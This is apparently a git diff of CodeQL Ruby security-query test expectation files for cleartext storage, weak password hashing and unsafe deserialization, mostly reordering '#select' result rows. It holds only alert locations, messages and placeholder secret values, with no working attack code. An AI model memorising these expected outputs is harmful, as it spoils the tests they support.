| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | -| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | -| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | -| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | -| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:87:15:98 | new_password | a write to password | -| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | -| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | -| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | -| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | -| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:83:21:94 | new_password | a write to password | -| app/controllers/users_controller.rb:28:27:28:38 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:28:27:28:38 | new_password | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | -| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | -| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:30:28:30:39 | new_password | a write to password | -| app/controllers/users_controller.rb:37:39:37:50 | new_password | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" : String | app/controllers/users_controller.rb:37:39:37:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" | an assignment to new_password | -| app/controllers/users_controller.rb:44:21:44:32 | new_password | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" : String | app/controllers/users_controller.rb:44:21:44:32 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" | an assignment to new_password | -| app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | -| app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" | a write to password | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" | a write to credit_card_number | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" | a write to SSN | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" | a write to password | -| app/models/user.rb:5:27:5:38 | new_password | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" : String | app/models/user.rb:5:27:5:38 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" | an assignment to new_password | -| app/models/user.rb:11:22:11:33 | new_password | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" : String | app/models/user.rb:11:22:11:33 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" | an assignment to new_password | -| app/models/user.rb:17:21:17:32 | new_password | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : String | app/models/user.rb:17:21:17:32 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" | an assignment to new_password | edges | app/controllers/users_controller.rb:3:5:3:16 | new_password : String | app/controllers/users_controller.rb:5:39:5:50 | new_password | provenance | | | app/controllers/users_controller.rb:3:5:3:16 | new_password : String | app/controllers/users_controller.rb:7:41:7:52 | new_password | provenance | | 
@@ -149,3 +120,32 @@ nodes | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : String | semmle.label | "f982bf2531c149a8a1444a951b12e830" : String | | app/models/user.rb:17:21:17:32 | new_password | semmle.label | new_password | subpaths +#select +| app/controllers/users_controller.rb:5:39:5:50 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:5:39:5:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | +| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | +| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:7:41:7:52 | new_password | a write to password | +| app/controllers/users_controller.rb:13:42:13:53 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:13:42:13:53 | new_password | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | +| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | +| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | +| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | +| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | +| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:15:87:15:98 | new_password | a write to password | +| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | +| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | +| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | +| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | +| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:21:83:21:94 | new_password | a write to password | +| app/controllers/users_controller.rb:28:27:28:38 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:28:27:28:38 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | +| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | +| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:30:28:30:39 | new_password | a write to password | +| app/controllers/users_controller.rb:37:39:37:50 | new_password | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" : String | app/controllers/users_controller.rb:37:39:37:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" | an assignment to new_password | +| app/controllers/users_controller.rb:44:21:44:32 | new_password | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" : String | app/controllers/users_controller.rb:44:21:44:32 | new_password | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" | an assignment to new_password | +| app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | +| app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" | a write to password | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" | a write to credit_card_number | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" | a write to SSN | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" | a write to password | +| app/models/user.rb:5:27:5:38 | new_password | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" : String | app/models/user.rb:5:27:5:38 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" | an assignment to new_password | +| app/models/user.rb:11:22:11:33 | new_password | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" : String | app/models/user.rb:11:22:11:33 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" | an assignment to new_password | +| app/models/user.rb:17:21:17:32 | new_password | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : String | app/models/user.rb:17:21:17:32 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" | an assignment to new_password | diff --git a/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected b/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected index 30e754c63d0d..0ad72554019f 100644 --- a/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected +++ b/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected 
@@ -1,11 +1,3 @@ -#select -| weak_hashing.rb:10:23:10:30 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:10:23:10:30 | password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | -| weak_hashing.rb:11:32:11:39 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:11:32:11:39 | password | $@ is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | -| weak_hashing.rb:12:23:12:30 | username | weak_hashing.rb:4:1:4:8 | username | weak_hashing.rb:12:23:12:30 | username | $@ is used in a hashing algorithm (MD5) that is insecure. | weak_hashing.rb:4:1:4:8 | username | Sensitive data (id) | -| weak_hashing.rb:13:23:13:23 | x | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:13:23:13:23 | x | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | -| weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:24:23:24:36 | call to get_password | Sensitive data (password) | -| weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:28:23:28:42 | ...[...] 
| Sensitive data (password) | -| weak_hashing.rb:32:25:32:38 | password_param | weak_hashing.rb:30:25:30:38 | password_param | weak_hashing.rb:32:25:32:38 | password_param | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:30:25:30:38 | password_param | Sensitive data (password) | edges | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:6:1:6:1 | x | provenance | | | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:10:23:10:30 | password | provenance | | 
@@ -26,3 +18,11 @@ nodes | weak_hashing.rb:30:25:30:38 | password_param | semmle.label | password_param | | weak_hashing.rb:32:25:32:38 | password_param | semmle.label | password_param | subpaths +#select +| weak_hashing.rb:10:23:10:30 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:10:23:10:30 | password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | +| weak_hashing.rb:11:32:11:39 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:11:32:11:39 | password | $@ is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | +| weak_hashing.rb:12:23:12:30 | username | weak_hashing.rb:4:1:4:8 | username | weak_hashing.rb:12:23:12:30 | username | $@ is used in a hashing algorithm (MD5) that is insecure. | weak_hashing.rb:4:1:4:8 | username | Sensitive data (id) | +| weak_hashing.rb:13:23:13:23 | x | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:13:23:13:23 | x | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | +| weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:24:23:24:36 | call to get_password | Sensitive data (password) | +| weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] 
| $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:28:23:28:42 | ...[...] | Sensitive data (password) | +| weak_hashing.rb:32:25:32:38 | password_param | weak_hashing.rb:30:25:30:38 | password_param | weak_hashing.rb:32:25:32:38 | password_param | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:30:25:30:38 | password_param | Sensitive data (password) | diff --git a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected index 9d220826b1cd..44f54744e4b1 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected +++ b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected @@ -1,5 +1,3 @@ -#select -| OjGlobalOptions.rb:14:22:14:30 | json_data | OjGlobalOptions.rb:13:17:13:22 | call to params | OjGlobalOptions.rb:14:22:14:30 | json_data | Unsafe deserialization depends on a $@. | OjGlobalOptions.rb:13:17:13:22 | call to params | user-provided value | edges | OjGlobalOptions.rb:13:5:13:13 | json_data | OjGlobalOptions.rb:14:22:14:30 | json_data | provenance | | | OjGlobalOptions.rb:13:17:13:22 | call to params | OjGlobalOptions.rb:13:17:13:28 | ...[...] | provenance | | @@ -10,3 +8,5 @@ nodes | OjGlobalOptions.rb:13:17:13:28 | ...[...] | semmle.label | ...[...] | | OjGlobalOptions.rb:14:22:14:30 | json_data | semmle.label | json_data | subpaths +#select +| OjGlobalOptions.rb:14:22:14:30 | json_data | OjGlobalOptions.rb:13:17:13:22 | call to params | OjGlobalOptions.rb:14:22:14:30 | json_data | Unsafe deserialization depends on a $@. | OjGlobalOptions.rb:13:17:13:22 | call to params | user-provided value | 
diff --git a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected index a7fd344d2865..4fa7c85df052 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected +++ b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected @@ -1,5 +1,3 @@ -#select -| OxGlobalOptions.rb:7:22:7:29 | xml_data | OxGlobalOptions.rb:6:16:6:21 | call to params | OxGlobalOptions.rb:7:22:7:29 | xml_data | Unsafe deserialization depends on a $@. | OxGlobalOptions.rb:6:16:6:21 | call to params | user-provided value | edges | OxGlobalOptions.rb:6:5:6:12 | xml_data | OxGlobalOptions.rb:7:22:7:29 | xml_data | provenance | | | OxGlobalOptions.rb:6:16:6:21 | call to params | OxGlobalOptions.rb:6:16:6:27 | ...[...] | provenance | | @@ -10,3 +8,5 @@ nodes | OxGlobalOptions.rb:6:16:6:27 | ...[...] | semmle.label | ...[...] | | OxGlobalOptions.rb:7:22:7:29 | xml_data | semmle.label | xml_data | subpaths +#select +| OxGlobalOptions.rb:7:22:7:29 | xml_data | OxGlobalOptions.rb:6:16:6:21 | call to params | OxGlobalOptions.rb:7:22:7:29 | xml_data | Unsafe deserialization depends on a $@. | OxGlobalOptions.rb:6:16:6:21 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected index b20b5e8b30e6..b99b2e7c7810 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected +++ b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected 
@@ -1,31 +1,3 @@ -#select -| UnsafeDeserialization.rb:12:27:12:41 | serialized_data | UnsafeDeserialization.rb:11:39:11:44 | call to params | UnsafeDeserialization.rb:12:27:12:41 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:11:39:11:44 | call to params | user-provided value | -| UnsafeDeserialization.rb:18:30:18:44 | serialized_data | UnsafeDeserialization.rb:17:39:17:44 | call to params | UnsafeDeserialization.rb:18:30:18:44 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:17:39:17:44 | call to params | user-provided value | -| UnsafeDeserialization.rb:24:24:24:32 | json_data | UnsafeDeserialization.rb:23:17:23:22 | call to params | UnsafeDeserialization.rb:24:24:24:32 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:23:17:23:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:30:27:30:35 | json_data | UnsafeDeserialization.rb:29:17:29:22 | call to params | UnsafeDeserialization.rb:30:27:30:35 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:29:17:29:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:42:24:42:32 | yaml_data | UnsafeDeserialization.rb:41:17:41:22 | call to params | UnsafeDeserialization.rb:42:24:42:32 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:41:17:41:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:54:22:54:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:54:22:54:30 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:55:22:55:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:55:22:55:30 | json_data | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:70:23:70:31 | json_data | UnsafeDeserialization.rb:60:17:60:22 | call to params | UnsafeDeserialization.rb:70:23:70:31 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:60:17:60:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:82:28:82:36 | json_data | UnsafeDeserialization.rb:81:16:81:21 | call to params | UnsafeDeserialization.rb:82:28:82:36 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:81:16:81:21 | call to params | user-provided value | -| UnsafeDeserialization.rb:88:26:88:33 | xml_data | UnsafeDeserialization.rb:87:15:87:20 | call to params | UnsafeDeserialization.rb:88:26:88:33 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:87:15:87:20 | call to params | user-provided value | -| UnsafeDeserialization.rb:94:22:94:29 | xml_data | UnsafeDeserialization.rb:93:16:93:21 | call to params | UnsafeDeserialization.rb:94:22:94:29 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:93:16:93:21 | call to params | user-provided value | -| UnsafeDeserialization.rb:110:34:110:36 | xml | UnsafeDeserialization.rb:109:11:109:16 | call to params | UnsafeDeserialization.rb:110:34:110:36 | xml | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:109:11:109:16 | call to params | user-provided value | -| UnsafeDeserialization.rb:116:25:116:33 | yaml_data | UnsafeDeserialization.rb:115:17:115:22 | call to params | UnsafeDeserialization.rb:116:25:116:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:115:17:115:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:123:25:123:33 | yaml_data | UnsafeDeserialization.rb:122:17:122:22 | call to params | UnsafeDeserialization.rb:123:25:123:33 | yaml_data | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:122:17:122:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:138:32:138:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:138:32:138:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:139:37:139:45 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:139:37:139:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:140:32:140:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:140:32:140:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | 